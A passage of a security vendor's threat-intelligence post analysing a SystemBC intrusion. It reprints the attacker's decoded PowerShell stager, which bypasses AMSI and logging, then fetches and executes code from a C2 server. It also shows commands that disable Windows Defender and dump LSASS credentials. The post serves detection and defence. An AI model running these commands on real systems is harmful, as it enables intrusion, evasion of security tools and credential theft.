{"id":10474,"date":"2021-05-10T09:00:00","date_gmt":"2021-05-10T08:00:00","guid":{"rendered":"https:\/\/www.withsecure.com\/resources-hub\/w-labs\/prelude-to-ransomware-systembc\/"},"modified":"2026-05-25T10:18:51","modified_gmt":"2026-05-25T09:18:51","slug":"prelude-to-ransomware-systembc","status":"publish","type":"lab_item","link":"https:\/\/www.withsecure.com\/de\/ressourcen\/w-labs\/prelude-to-ransomware-systembc\/","title":{"rendered":"Prelude to Ransomware: SystemBC"},"content":{"rendered":"<section\n    class=\"wp-block-one-column-block edwp-block js-wp-block-one-column-block wp-block-one-column-block--content-1 wp-block-one-column-block--meta-sharing layout--spacing-xxxxl-top layout--spacing-xl-bottom\"\n    >\n    <div class=\"wp-block-one-column-block__container\">\n                                                                                                                            <div class='wp-block-one-column-block__meta-sharing-grid'><div class=\"wp-component-content wp-component-content--default wp-block-one-column-block__content fade-in\">\n            <h1 class=\"wp-component-heading text--h2 wp-component-content__title\">\n    Prelude to Ransomware:<span class=\"blue-text\">SystemBC<\/span><\/h1>                    <div class=\"wp-component-content__inner\">\n                                                    <div class=\"wp-component-content__meta\">\n                                                                            <span class=\"wp-component-content__meta-categories\">\n                                                                    <span class=\"wp-component-content__meta-category\">\n                                        Endpoint Security                                    <\/span>\n                                                                    <span class=\"wp-component-content__meta-category\">\n                                        Ransomware                                    <\/span>\n                       
                                             <span class=\"wp-component-content__meta-category\">\n                                        Threat intelligence                                    <\/span>\n                                                            <\/span>\n                                                                                                    <span class=\"wp-component-content__meta-date\">\n                                10 Mai, 2021                            <\/span>\n                                                                    <\/div>\n                                            <\/div>\n                <\/div><section\n    class=\"wp-block-sharing-icons edwp-block wp-block-sharing-icons--disable-border wp-block-sharing-icons--content-1 wp-block-sharing-icons--disable-container wp-block-one-column-block__sharing fade-in wp-block-one-column-block__sharing fade-in\"\n    >\n    <div class=\"wp-block-sharing-icons__container\">\n        <div class=\"wp-block-sharing-icons__inner\">\n                            <p class=\"wp-block-sharing-icons__title fade-in\">\n                    Teilen Sie dies                <\/p>\n                        <div class=\"wp-component-socials wp-component-socials--dark-mode\">\n    \n            <a href=\"https:\/\/www.linkedin.com\/shareArticle?mini=true&#038;url=https:\/\/www.withsecure.com\/de\/ressourcen\/w-labs\/prelude-to-ransomware-systembc\/&#038;title=Prelude%20to%20Ransomware:%20SystemBC\" target=\"_blank\" rel=\"noreferer noopener\" class=\"wp-component-socials__link\" title=\"Auf LinkedIn teilen\">\n            <svg class='edwp-icon edwp-icon--xlg js-icon ' aria-hidden='true'>\n                <use xlink:href='#linkedin'><\/use>\n            <\/svg>        <\/a>\n    \n            <a href=\"http:\/\/x.com\/share?text=Prelude to Ransomware: SystemBC&#038;url=https:\/\/www.withsecure.com\/de\/ressourcen\/w-labs\/prelude-to-ransomware-systembc\/\" target=\"_blank\" rel=\"noreferer 
noopener\" class=\"wp-component-socials__link wp-component-socials__link--twitter\" title=\"Auf X (Twitter) teilen\">\n            <svg class='edwp-icon edwp-icon--xlg js-icon ' aria-hidden='true'>\n                <use xlink:href='#x'><\/use>\n            <\/svg>        <\/a>\n    \n    \n    <\/div>\n        <\/div>\n    <\/div>\n<\/section>\n<\/div>                                                                                <\/div>\n<\/section>\n\n\n<section\n    class=\"wp-block-one-column-block edwp-block js-wp-block-one-column-block wp-block-one-column-block--content-1 layout--spacing-xxxl-bottom\"\n    >\n    <div class=\"wp-block-one-column-block__container\">\n                                                                                                                                    <div class=\"wp-component-image__wrapper wp-block-one-column-block__image fade-in\">\n                    <figure class=\"wp-component-image__figure\">\n                                            <img loading=\"lazy\" decoding=\"async\" width=\"1200\" height=\"800\" src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/ws_labs_research.jpg.webp\" class=\"wp-component-image\n                            wp-component-image--desktop\n                            wp-component-image--mobile\n                            wp-component-image--ratio-content-25-1 wp-component-image--fit-cover\" alt=\"\" srcset=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/ws_labs_research.jpg.webp 1200w, https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/ws_labs_research-300x200.jpg.webp 300w, https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/ws_labs_research-1024x683.jpg.webp 1024w, https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/ws_labs_research-768x512.jpg.webp 768w, https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/ws_labs_research-447x298.jpg.webp 447w, 
https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/ws_labs_research-219x146.jpg.webp 219w\" sizes=\"auto, (max-width: 1200px) 100vw, 1200px\" \/>                                                    <\/figure>\n                    <\/div>\n                                                                                <\/div>\n<\/section>\n\n\n<section\n    class=\"wp-block-two-column-block edwp-block js-wp-block-two-column-block wp-block-two-column-block--content-1 wp-block-two-column-block__left--align-y-top wp-block-two-column-block__right--align-y-top wp-block-two-column-block--split-sidebar layout--none-top layout--spacing-xxxl-bottom\"\n    data-block-id=\"block_01d167d1bdfb56c1531d84fefeb7680b\"\n    >\n    <div class=\"wp-block-two-column-block__container row-load\">\n                                                        <div class=\"wp-block-two-column-block__left\">\n                                    <div class=\"wp-component-authors-list wp-block-two-column-block__authors\">\n                    <p class=\"wp-component-authors-list__title\">\n                Authors            <\/p>\n        \n        <div class=\"wp-component-authors-list__items\">\n                                                <div class=\"wp-component-author-card \">\n    <div class=\"wp-component-author-card__media\">\n                    <span class=\"wp-component-author-card__photo-placeholder\" aria-hidden=\"true\">\n                <svg viewBox=\"0 0 64 64\" role=\"presentation\" focusable=\"false\">\n                    <path d=\"M32 34c-8.1 0-14.7 6.6-14.7 14.7v3.5h29.4v-3.5C46.7 40.6 40.1 34 32 34z\"><\/path>\n                    <path d=\"M32 31.2c6 0 10.9-4.9 10.9-10.9S38 9.4 32 9.4s-10.9 4.9-10.9 10.9S26 31.2 32 31.2z\"><\/path>\n                <\/svg>\n            <\/span>\n            <\/div>\n    <div class=\"wp-component-author-card__content\">\n                    <h3 class=\"wp-component-author-card__name\">Callum Roxan<\/h3>\n        \n              
  \n            <\/div>\n\n<\/div>\n\n                                                                <div class=\"wp-component-author-card \">\n    <div class=\"wp-component-author-card__media\">\n                    <span class=\"wp-component-author-card__photo-placeholder\" aria-hidden=\"true\">\n                <svg viewBox=\"0 0 64 64\" role=\"presentation\" focusable=\"false\">\n                    <path d=\"M32 34c-8.1 0-14.7 6.6-14.7 14.7v3.5h29.4v-3.5C46.7 40.6 40.1 34 32 34z\"><\/path>\n                    <path d=\"M32 31.2c6 0 10.9-4.9 10.9-10.9S38 9.4 32 9.4s-10.9 4.9-10.9 10.9S26 31.2 32 31.2z\"><\/path>\n                <\/svg>\n            <\/span>\n            <\/div>\n    <div class=\"wp-component-author-card__content\">\n                    <h3 class=\"wp-component-author-card__name\">Sami Ruohonen<\/h3>\n        \n                \n            <\/div>\n\n<\/div>\n\n                                    <\/div>\n\n            <\/div>\n<nav\n    class=\"wp-component-content-navigation wp-block-two-column-block__content-nav js-content-navigation\"\n    data-bem-base=\"wp-component-content-navigation\"\n    data-nav-column=\"left\"\n    data-nav-type=\"auto\"\n>\n            <p class=\"wp-component-content-navigation__title\">\n            Content        <\/p>\n    \n    <div class=\"wp-component-content-navigation__mobile\">\n        <label class=\"wp-component-content-navigation__mobile-label\">\n            <span class=\"wp-component-content-navigation__mobile-label-text\">\n                Inhaltliche Navigation            <\/span>\n            <select class=\"wp-component-content-navigation__select js-content-navigation-select\">\n                <option value=\"\">\n                    W\u00e4hlen Sie einen Abschnitt                <\/option>\n                            <\/select>\n        <\/label>\n    <\/div>\n\n    <div class=\"wp-component-content-navigation__desktop\">\n        <div 
class=\"wp-component-content-navigation__list-wrapper\">\n            <span\n                class=\"wp-component-content-navigation__indicator js-content-navigation-indicator\"\n                aria-hidden=\"true\"\n            ><\/span>\n            <ul class=\"wp-component-content-navigation__list js-content-navigation-list\">\n                            <\/ul>\n        <\/div>\n    <\/div>\n<\/nav>\n<section\n    class=\"wp-block-sharing-icons edwp-block wp-block-sharing-icons--disable-border wp-block-sharing-icons--disable-container wp-block-two-column-block__share wp-block-two-column-block__hide-mobile wp-block-two-column-block__share wp-block-two-column-block__hide-mobile\"\n    >\n    <div class=\"wp-block-sharing-icons__container\">\n        <div class=\"wp-block-sharing-icons__inner\">\n                            <p class=\"wp-block-sharing-icons__title fade-in\">\n                    Share this story                <\/p>\n                        <div class=\"wp-component-socials wp-component-socials--dark-mode\">\n    \n            <a href=\"https:\/\/www.linkedin.com\/shareArticle?mini=true&#038;url=https:\/\/www.withsecure.com\/de\/ressourcen\/w-labs\/prelude-to-ransomware-systembc\/&#038;title=Prelude%20to%20Ransomware:%20SystemBC\" target=\"_blank\" rel=\"noreferer noopener\" class=\"wp-component-socials__link\" title=\"Auf LinkedIn teilen\">\n            <svg class='edwp-icon edwp-icon--xlg js-icon ' aria-hidden='true'>\n                <use xlink:href='#linkedin'><\/use>\n            <\/svg>        <\/a>\n    \n            <a href=\"http:\/\/x.com\/share?text=Prelude to Ransomware: SystemBC&#038;url=https:\/\/www.withsecure.com\/de\/ressourcen\/w-labs\/prelude-to-ransomware-systembc\/\" target=\"_blank\" rel=\"noreferer noopener\" class=\"wp-component-socials__link wp-component-socials__link--twitter\" title=\"Auf X (Twitter) teilen\">\n            <svg class='edwp-icon edwp-icon--xlg js-icon ' aria-hidden='true'>\n                <use 
xlink:href='#x'><\/use>\n            <\/svg>        <\/a>\n    \n    \n    <\/div>\n        <\/div>\n    <\/div>\n<\/section>\n                <\/div>\n                                                <div class=\"wp-block-two-column-block__right\">\n                                <div class=\"wp-component-paragraph wp-block-two-column-block__paragraph \">\n    <h2>Introduction<\/h2>\n<p>In late February 2021, WithSecure\u2019s Managed Detection and Response (MDR) service identified the execution of SystemBC malware as part of a hands-on-keyboard crimeware intrusion. The intrusion was stopped before the threat actor could reach their objective, but in <a href=\"https:\/\/news.sophos.com\/en-us\/2020\/12\/16\/systembc\/\" target=\"_blank\" rel=\"noopener\">recent reporting<\/a> the use of this malware has been tied to ransomware activity. WithSecure was also able to identify another recent intrusion conducted by the threat actor where they had deployed Ryuk ransomware.<\/p>\n<p>WithSecure\u2019s analysis of the SystemBC sample identified that this was a new variant of the malware, with several notable differences from previous versions. The sample was executed by a previously undocumented \u201cwrapper\u201d, which WithSecure\u2019s research suggests has been used in combination with multiple malware families common in crimeware intrusions.<\/p>\n<p>This blog provides insight into both the intrusion and the malware sample, so that organizations can be informed and protect themselves from this evolving threat. A detection section is included, which contains actionable takeaways so that organizations can improve their own defenses against this, and similar, threats.<\/p>\n<h2>Intrusion Technical Detail<\/h2>\n<p>The intrusion began in a third-party IT service provider, which had an unpatched VPN appliance that was vulnerable to remote exploitation. 
The threat actor was able to extract credentials from this device and then access a host with connectivity to the victim network. The threat actor entered the victim network via a Remote Desktop Protocol (RDP) connection using stolen credentials of an administrator account belonging to that third-party IT service provider.<\/p>\n<figure><img decoding=\"async\" src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/251.png.webp\" alt=\"\" class=\"wp-component-image\" \/><\/figure>\n<p>Figure 1: Initial Access Attack Path<\/p>\n<p>Once the RDP session had connected, the threat actor immediately began to enumerate the victim domain and network. With an interactive PowerShell session, they used Windows utilities such as net.exe, ping.exe and nltest.exe.<\/p>\n<pre><code class=\"language-bash\">C:\\Windows\\System32\\net.exe group &quot;enterprise admins&quot; \/domain\nC:\\Windows\\System32\\net.exe user &lt;USER&gt; \/domain\nC:\\Windows\\System32\\net.exe group &quot;domain admins&quot; \/domain\nC:\\Windows\\System32\\net.exe group &quot;domain computers&quot; \/domain\nC:\\Windows\\System32\\nltest.exe \/dclist: &lt;DOMAIN&gt;<\/code><\/pre>\n<p>Figure 2: Enumeration Command Lines<\/p>\n<p>Shortly after this, they scanned the network using a portable version of Advanced IP Scanner, a tool popular in crimeware circles. The scanner was used to sweep multiple sub-networks for normal service ports and dynamic ranges.<\/p>\n<pre><code class=\"language-bash\">%USERPROFILE%\\Downloads\\Advanced_IP_Scanner_2.5.3850.exe<\/code><\/pre>\n<p>Figure 3: Advanced IP Scanner Path<\/p>\n<p>The scanner was downloaded from the software provider\u2019s website via Internet Explorer and executed with explorer.exe. 
WithSecure\u2019s investigation uncovered a forensic artifact that suggests the threat actor was watching a <a href=\"https:\/\/www.youtube.com\/embed\/NCc3xINQL0c?vq=large\" target=\"_blank\" rel=\"noopener\">YouTube video<\/a> on how to use this tool prior to execution.<\/p>\n<p>After initial reconnaissance, the adversary executed a Base64 encoded PowerShell command. The decoded command is included below.<\/p>\n<pre><code class=\"language-bash\">If($PSVERsIONTabLe.PSVERSIoN.MajOR -ge 3){$GPF=[ref].ASsEMBly.GetTypE(&#x27;System.Management.Automation.Utils&#x27;).&quot;GeTFIe`lD&quot;(&#x27;cachedGroupPolicySettings&#x27;,&#x27;N&#x27;+&#x27;onPublic,Static&#x27;);IF($GPF){$GPC=$GPF.GetVALUE($nuLL);If($GPC[&#x27;ScriptB&#x27;+&#x27;lockLogging&#x27;]){$GPC[&#x27;ScriptB&#x27;+&#x27;lockLogging&#x27;][&#x27;EnableScriptB&#x27;+&#x27;lockLogging&#x27;]=0;$GPC[&#x27;ScriptB&#x27;+&#x27;lockLogging&#x27;][&#x27;EnableScriptBlockInvocationLogging&#x27;]=0}$vAl=[CoLLectIonS.GenErIc.DICTIONary[String,SYSTEm.OBJECT]]::New();$val.Add(&#x27;EnableScriptB&#x27;+&#x27;lockLogging&#x27;,0);$VAl.ADd(&#x27;EnableScriptBlockInvocationLogging&#x27;,0);$GPC[&#x27;HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptB&#x27;+&#x27;lockLogging&#x27;]=$VAl}ElSe{[SCripTBLOck].&quot;GEtFiE`lD&quot;(&#x27;signatures&#x27;,&#x27;N&#x27;+&#x27;onPublic,Static&#x27;).SeTVaLue($nuLL,(New-ObjecT COllEcTiONs.GenERIC.HashSET[StRINg]))}[ReF].ASSeMBly.GEtTyPE(&#x27;System.Management.Automation.AmsiUtils&#x27;)|?{$_}|%{$_.GEtFiELd(&#x27;amsiInitFailed&#x27;,&#x27;NonPublic,Static&#x27;).SETValue($NULL,$tRUe)};};[SySTEm.NeT.SERVIcePoINTMaNAGeR]::ExpecT100ContInue=0;$wc=NEw-OBJECt SYstEM.NeT.WEBCLIENT;$u=&#x27;Mozilla\/5.0 (Windows NT 6.1; WOW64; Trident\/7.0; rv:11.0) like Gecko&#x27;;[System.Net.ServicePointManager]::ServerCertificateValidationCallback = 
{$true};$Wc.HeAdeRS.AdD(&#x27;User-Agent&#x27;,$u);$WC.PRoXy=[System.Net.WeBRequest]::DefaULtWeBProXY;$Wc.PrOXY.CRedeNTiALS = [SysTEm.NeT.CrEDeNtIaLCAChe]::DEFAULtNEtwORKCREdENTiALs;$Script:Proxy = $wc.Proxy;$K=[System.TEXt.ENCoding]::ASCII.GEtBYTES(&#x27;b3a9ff9c3041b9841a771013e1ac9f21&#x27;);$R={$D,$K=$ArGs;$S=0..255;0..255|%{$J=($J+$S[$_]+$K[$_%$K.CoUNt])%256;$S[$_],$S[$J]=$S[$J],$S[$_]};$D|%{$I=($I+1)%256;$H=($H+$S[$I])%256;$S[$I],$S[$H]=$S[$H],$S[$I];$_-bXor$S[($S[$I]+$S[$H])%256]}};$ser=&#x27;https:\/\/193.29.104.187\/:443&#x27;;$t=&#x27;\/news.php&#x27;;$WC.HeadERs.ADd(&quot;Cookie&quot;,&quot;session=SWk+gWN3HiMjZmI\/X\/6tsGgRVb4=&quot;);$DatA=$WC.DowNloadData($Ser+$t);$IV=$Data[0..3];$DATa=$DATA[4..$data.LenGth];-jOIn[Char[]](&amp; $R $DaTa ($IV+$K))|IEX<\/code><\/pre>\n<p>Figure 4: Decoded PowerShell Command<\/p>\n<p>The command is associated with the PowerShell Empire framework and disables ScriptBlock logging and AMSI before connecting out to an external Command and Control (C2) server. 
The threat actor was using the default version of PowerShell Empire with the following C2 and UserAgent:<\/p>\n<pre><code class=\"language-bash\">C2: https:\/\/193.29.104[.]187\/news.php\nUser-agent: Mozilla\/5.0 (Windows NT 6.1; WOW64; Trident\/7.0; rv:11.0) like Gecko<\/code><\/pre>\n<p>Figure 5: PSE C2 &amp; User Agent<\/p>\n<p>After establishing C2 communication through PowerShell Empire and conducting additional reconnaissance, the actor disabled Windows Defender with multiple registry changes using reg.exe.<\/p>\n<pre><code class=\"language-bash\">reg.exe add &quot;HKLM\\Software\\Policies\\Microsoft\\Windows Defender&quot; \/v DisableAntiSpyware \/t REG_DWORD \/d 1 \/f\nreg.exe add &quot;HKLM\\Software\\Policies\\Microsoft\\Windows Defender&quot; \/v DisableAntiVirus \/t REG_DWORD \/d 1 \/f\nreg.exe add &quot;HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\MpEngine&quot; \/v MpEnablePus \/t REG_DWORD \/d 0 \/f\nreg.exe add &quot;HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection&quot; \/v DisableBehaviorMonitoring \/t REG_DWORD \/d 1 \/f\nreg.exe add &quot;HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection&quot; \/v DisableIOAVProtection \/t REG_DWORD \/d 1 \/f\nreg.exe add &quot;HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection&quot; \/v DisableOnAccessProtection \/t REG_DWORD \/d 1 \/f\nreg.exe add &quot;HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection&quot; \/v DisableRealtimeMonitoring \/t REG_DWORD \/d 1 \/f\nreg.exe add &quot;HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection&quot; \/v DisableRoutinelyTakingAction \/t REG_DWORD \/d 1 \/f\nreg.exe add &quot;HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection&quot; \/v DisableScanOnRealtimeEnable \/t REG_DWORD \/d 1 \/f\nreg.exe add &quot;HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\Reporting&quot; \/v DisableEnhancedNotifications \/t 
REG_DWORD \/d 1 \/f\nreg.exe add &quot;HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\SpyNet&quot; \/v DisableBlockAtFirstSeen \/t REG_DWORD \/d 1 \/f\nreg.exe add &quot;HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\SpyNet&quot; \/v SpynetReporting \/t REG_DWORD \/d 0 \/f\nreg.exe add &quot;HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\SpyNet&quot; \/v SubmitSamplesConsent \/t REG_DWORD \/d 2 \/f\nreg.exe delete &quot;HKLM\\Software\\Policies\\Microsoft\\Windows Defender&quot; \/f<\/code><\/pre>\n<p>Figure 6: &quot;reg.exe&quot; Command Lines<\/p>\n<p>Immediately after Windows Defender was disabled the actor downloaded an archive from \u201csendspace[.]com\u201d \u2013 an online file sharing platform.<\/p>\n<pre><code class=\"language-bash\">hXXps:\/\/fs12n1.sendspace[.]com\/dl\/2dcbf9eb9e28920a81febd3f0a8cda84\/6039c40226878d2e\/px2kd3\/1.rar<\/code><\/pre>\n<p>Figure 7: Malicious Archive URL<\/p>\n<p>Once extracted from the archive then the file \u201cSvchost.exe\u201d (2dc93817039e6fa4fae014e1386cffa7ac35b89feac59d8abe7f51be1c089580) was executed. WithSecure\u2019s analysis shows this file is a new variant of the SystemBC malware family. 
Full analysis of the malware is included later in this post.<\/p>\n<figure><img decoding=\"async\" src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/261.png.webp\" alt=\"\" class=\"wp-component-image\" \/><\/figure>\n<p>Figure 8: SystemBC Download<\/p>\n<p>With multiple routes of access established to the network the threat actor then downloaded another archive, from the same domain, containing four additional files.<\/p>\n<pre><code class=\"language-bash\">hXXps:\/\/fs12n5.sendspace[.]com\/dl\/5593c4325c0f9c23cb59661893ae9454\/6039c46105fab7d4\/3dugcw\/2.zip<\/code><\/pre>\n<p>Figure 9: Additional Malicious Archive URL<\/p>\n<p>The files downloaded were stored on a share that was mapped for all hosts on the victim network.<\/p>\n<pre><code class=\"language-bash\">servers0.bat\n1.ps1\na.ps1\nPsExec.exe<\/code><\/pre>\n<p>Figure 10: Archive Contents<\/p>\n<p>The first file of interest, servers0.bat, was a batch file that contained a long list of commands to execute the \u201c1.ps1\u201d PowerShell script on multiple hosts using PsExec.exe.<\/p>\n<pre><code class=\"language-bash\">start PsExec.exe -d \\\\&lt;hostname&gt; -u &quot;&lt;username&gt;&quot; -p &quot;&lt;pass&gt;&quot; -accepteula -s cmd \/c &quot;powershell.exe -ExecutionPolicy Bypass -file \\\\&lt;share&gt;\\l.ps1&quot;\nstart PsExec.exe -d \\\\&lt;hostname&gt; -u &quot;&lt;username&gt;&quot; -p &quot;&lt;pass&gt;$&quot; -accepteula -s cmd \/c &quot;powershell.exe -ExecutionPolicy Bypass -file \\\\&lt;share&gt;\\l.ps1&quot;\nstart PsExec.exe -d \\\\&lt;hostname&gt; -u &quot;&lt;username&gt;&quot; -p &quot;&lt;pass&gt;$&quot; -accepteula -s cmd \/c &quot;powershell.exe -ExecutionPolicy Bypass -file \\\\&lt;share&gt;\\l.ps1&quot;\nstart PsExec.exe -d \\\\&lt;hostname&gt; -u &quot;&lt;username&gt;&quot; -p &quot;&lt;pass&gt;$&quot; -accepteula -s cmd \/c &quot;powershell.exe -ExecutionPolicy Bypass -file \\\\&lt;share&gt;\\l.ps1&quot;\n\u2026<\/code><\/pre>\n<p>Figure 11: Truncated 
Contents of &quot;servers0.bat&quot;<\/p>\n<p>The PowerShell script \u201c1.ps1\u201d would attempt to create a dump of the <a href=\"https:\/\/docs.microsoft.com\/en-us\/windows\/win32\/secauthn\/lsa-authentication\" target=\"_blank\" rel=\"noopener\">LSASS<\/a> process using rundll32.exe in combination with comsvcs.dll. If successful, the threat actor would look to extract any credentials stored in the memory of this process using tools such as Mimikatz.<\/p>\n<pre><code class=\"language-bash\">$computerName = $env:computername;\n$procid = Get-Process | Where-Object {$_.ProcessName -eq &#x27;lsass&#x27;} | Select-Object Id\nPowershell -c rundll32.exe C:\\Windows\\System32\\comsvcs.dll, MiniDump $procid.Id $Env:TEMP$computerName full\nStart-Sleep -s 59\nCopy-Item -Path $Env:TEMP$computerName -Destination &quot;\\\\&lt;hostname&gt;\\&lt;share&gt;\\$($computerName)&quot;<\/code><\/pre>\n<p>Figure 12: Contents of &quot;1.ps1&quot;<\/p>\n<p>In addition, the threat actor deployed a PowerShell script named \u201ca.ps1\u201d that had the capability to further enumerate hosts across the network. Interestingly, the file still had the hostname and domain from a previous intrusion of another victim by the group, which allowed WithSecure to notify that victim of the activity. 
WithSecure did not see any evidence of the execution of this script despite its creation on victim systems by the threat actor.<\/p>\n<pre><code class=\"language-bash\">$path = &quot;\\\\&lt;hostname&gt;.&lt;domain&gt;\\s$\\&quot; + $env:computername;\n$OutputVariable = (cmd.exe \/c tasklist \/v) | Out-File -FilePath &quot;$($path)_task.txt&quot; -Append;\n$OutputVariable = (cmd.exe \/c arp -a) | Out-File -FilePath &quot;$($path)_arp.txt&quot; -Append;\n$OutputVariable = (cmd.exe \/c dir C:\\users) | Out-File -FilePath &quot;$($path)_users.txt&quot; -Append;<\/code><\/pre>\n<p>Figure 13: Contents of &quot;a.ps1&quot;<\/p>\n<p>The actor was not able to execute any further malicious commands, as containment was actioned by the WithSecure MDR service and the victim organization.<\/p>\n<h3>&quot;Svchost.exe&quot; Analysis &#8211; SystemBC<\/h3>\n<p>File Name: svchost.exe<\/p>\n<p>SHA1: f8af1b293aecdb3d1fe038b4b638f283ee852287<\/p>\n<p>MD5: fa93cfe0898c704551cefdfa193d406f<\/p>\n<p>SHA256: 2dc93817039e6fa4fae014e1386cffa7ac35b89feac59d8abe7f51be1c089580<\/p>\n<p>Path: C:\\Users\\Public\\svchost.exe<\/p>\n<p>Execution Command Line: C:\\Users\\Public\\svchost.exe start<\/p>\n<h2>Wrapper<\/h2>\n<p>The \u201csvchost.exe\u201d binary is a wrapper that contains an encrypted SystemBC payload. When the wrapper executes, it decrypts the payload and injects it into the memory of a child process. The technique used is commonly known as process hollowing.<\/p>\n<p>All the key APIs of the wrapper are resolved at runtime. After the resolution routine, it creates a new process using its own command line. 
A new child process is then created out of the wrapper disk image.<\/p>\n<figure><img decoding=\"async\" src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/281.png.webp\" alt=\"\" class=\"wp-component-image\" \/><\/figure>\n<p>Figure 14: Process Command Line<\/p>\n<p>The child is launched in a suspended state; this is done to allow subsequent process injection into the new child process. The wrapper uses NtUnmapViewOfSection to empty the target process memory.<\/p>\n<figure><img decoding=\"async\" src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/291.png.webp\" alt=\"\" class=\"wp-component-image\" \/><\/figure>\n<p>Figure 15: NtUnmapViewOfSection Code<\/p>\n<p>0x7000 bytes of new memory are allocated in the child process with VirtualAllocEx at 0x400000, and the permissions of the region are set to PAGE_EXECUTE_READWRITE (flProtect = 0x40). The SystemBC backdoor is then decrypted and injected into the new memory space with WriteProcessMemory.<\/p>\n<figure><img decoding=\"async\" src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/302.png.webp\" alt=\"\" class=\"wp-component-image\" \/><\/figure>\n<p>Figure 16: WriteProcessMemory Code<\/p>\n<p>After the required code is injected, the wrapper finally sets the main thread context in the child to point to the correct entry point at 0x1000 and calls ResumeThread on the child process. 
The use of process hollowing ensures the unpacked malicious code is only visible in process memory and not in the on-disk version of the file.<\/p>\n<figure><img decoding=\"async\" src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/32.png.webp\" alt=\"\" class=\"wp-component-image\" \/><\/figure>\n<p>Figure 17: Wrapper Execution Flow<\/p>\n<p>Pivoting from the debug string found in the wrapper, \u201cy:\\test4\\e93\\Debug\\e93.pdb\u201d, we can see multiple other samples, with other payloads such as <a href=\"https:\/\/www.virustotal.com\/gui\/file\/9916d1369c9d2d0e64a8d5d9bb185a63386c27949b46fcec479ff024f3326340\/details\" target=\"_blank\" rel=\"noopener\">Bazar Loader<\/a>. The earliest observed malware sample in WithSecure&#x27;s telemetry dates back to December 2019. There were over 300 samples in total that contain a similar PDB path and appear to be the same wrapper. The table below includes a few selected examples.<\/p>\n<table><thead><tr><th>PDB Path<\/th><th>Compilation Time Stamp<\/th><\/tr><\/thead><tbody><tr><td>y:\\test4\\104\\Debug\\104.pdb<\/td><td>2019-12-15 18:02<\/td><\/tr><tr><td>y:\\test4\\a30\\Debug\\a30.pdb<\/td><td>2020-08-09 11:58<\/td><\/tr><tr><td>y:\\test4\\e45\\Debug\\e45.pdb<\/td><td>2020-09-06 17:07<\/td><\/tr><tr><td>y:\\test4\\e62\\Debug\\e62.pdb<\/td><td>2020-12-01 10:43<\/td><\/tr><tr><td>y:\\test4\\e88\\Debug\\e88.pdb<\/td><td>2021-01-11 10:19<\/td><\/tr><tr><td>y:\\test4\\e93\\Debug\\e93.pdb<\/td><td>2021-02-23 21:32<\/td><\/tr><tr><td>y:\\test4\\e97\\Debug\\e97.pdb<\/td><td>2021-03-02 17:55<\/td><\/tr><tr><td>y:\\test4\\e98\\Debug\\e98.pdb<\/td><td>2021-03-10 16:07<\/td><\/tr><tr><td>y:\\test4\\e98\\Debug\\e98.pdb<\/td><td>2021-03-13 23:22<\/td><\/tr><tr><td>y:\\test4\\e94\\Debug\\e94.pdb<\/td><td>2021-03-20 10:16<\/td><\/tr><\/tbody><\/table>\n<p>The PDB paths suggest a single environment is used to compile the malware. This is likely linked to a single malware developer or team. 
Artifacts within the binaries suggest that the author is Russian-speaking, which aligns with WithSecure&#x27;s knowledge of the wider crimeware actor who conducted the intrusion.<\/p>\n<h2>SystemBC Payload<\/h2>\n<p>As <a href=\"https:\/\/news.sophos.com\/en-us\/2020\/12\/16\/systembc\/\" target=\"_blank\" rel=\"noopener\">reported by Sophos<\/a>, SystemBC is known as an \u201coff-the-shelf\u201d piece of malware, which is bundled with a TOR client to phone home via the TOR network. In an even earlier version, <a href=\"https:\/\/www.proofpoint.com\/us\/threat-insight\/post\/systembc-christmas-july-socks5-malware-and-exploit-kits\" target=\"_blank\" rel=\"noopener\">found by Proofpoint in 2019<\/a>, the malware was using a SOCKS5 proxy. The SystemBC payload analyzed by WithSecure shares a number of key capabilities with the previously reported samples.<\/p>\n<p>On first execution, it will create a scheduled task for persistence via a COM interface (CLSID: 148BD52A-A2AB-11CE-B11F-00AA00530503). The scheduled task is created from the wrapper image, named \u201cwow64\u201d, given the \u201cstart\u201d argument and scheduled to run every two minutes after the first execution at the current time. The CLSID is located in the .data section starting at 0x50C3.<\/p>\n<p>The malware executes files received from the C2 after writing the files out to %TEMP%. It supports execution of EXE, VBS, BAT, CMD and PS1 file types.<\/p>\n<figure><img decoding=\"async\" src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/33.png.webp\" alt=\"\" class=\"wp-component-image\" \/><\/figure>\n<p>Figure 18: C2 Identification Routine<\/p>\n<p>PS1 files will be executed with PowerShell using the parameters \u201c-WindowStyle Hidden -ep bypass \u2013file\u201d and the payload, which is identical to the other public samples analyzed by security researchers. 
